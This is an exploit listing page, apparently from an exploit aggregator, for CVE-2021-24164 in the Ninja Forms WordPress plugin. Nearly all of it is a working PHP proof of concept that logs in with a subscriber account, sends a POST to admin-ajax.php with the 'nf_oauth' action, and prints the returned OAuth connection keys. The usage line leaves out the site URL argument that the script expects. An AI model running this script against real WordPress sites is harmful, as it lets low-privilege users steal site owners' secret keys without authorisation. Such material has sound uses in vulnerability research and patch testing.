Exploit for Ninja Forms < 3.4.34.1 - Authenticated OAuth Connection Key Disclosure CVE-2021-24164

Name: Exploit for Ninja Forms < 3.4.34.1 - Authenticated OAuth Connection Key Disclosure CVE-2021-24164
Rating: 5 (134 reviews)

2021-02-16 | CVSS 0.9

## https://sploitus.com/exploit?id=WPEX-ID:DFA32AFA-C6DE-4237-A9F2-709843DCDA89
Usage: php poc.php subscriber password 

<?php
// Settings
$wp_url = $argv[1];
$wp_user = $argv[2];
$wp_pass = $argv[3];

// Log in as subscriber
$ch = curl_init();
$cookiejar = tempnam(sys_get_temp_dir(), 'cookiejar-');
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
   'log'        => $wp_user,
   'pwd'        => $wp_pass,
   'rememberme' => 'forever',
   'wp-submit'  => 'Log+In',
]);
$output = curl_exec($ch);
curl_close($ch);

// Set redirect url
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/wp-admin/admin-ajax.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, [
   'action' =>  'nf_oauth',

]);

$output = curl_exec($ch);
curl_close($ch);
print_r($output);